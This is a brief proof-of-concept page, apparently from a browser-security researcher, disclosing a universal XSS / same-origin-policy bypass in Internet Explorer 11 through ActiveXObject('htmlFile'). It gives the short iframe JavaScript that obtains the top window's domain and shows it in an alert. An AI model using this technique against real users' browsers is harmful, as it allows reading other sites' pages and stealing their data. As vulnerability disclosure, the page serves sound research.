IE11 - UXSS / SOP Bypass
Below we have an iframe pointing to brokenbrowser.com which can retrieve the top window domain and access its DOM bypassing the SOP policy.
The code inside the iFrame is simple:
doc = new ActiveXObject("htmlFile");
// doc is now a document object with the domain of
// the top window instead of its iFrame.
alert("The top domain is: " + doc.domain);
If you have questions, contact me here: @magicmac2000
For more information about this vulnerability, UXSS IE ActiveXObject/htmlFile